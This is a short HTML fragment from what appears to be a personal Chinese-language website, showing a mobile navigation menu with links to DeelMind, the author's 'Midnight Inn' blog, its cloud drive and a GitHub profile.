<div class="mobile-menus-out" >

</div>
<div class="mobile-menus">
    
    
    
    <a class="dynamic-menu " target="_self"   href="http://DeelMind.com/">DeelMind</a>
    
    
    <a class="dynamic-menu " target="_self"   href="http://sunwu.world/">子夜旅馆</a>
    
    
    <a class="dynamic-menu " target="_blank"  href="http://pan.sunwu.world/">子夜旅馆的网盘</a>
    
    
    <a class="dynamic-menu " target="_blank"  href="https://github.com/sunwu57">github</a>
    
</div>


</html>
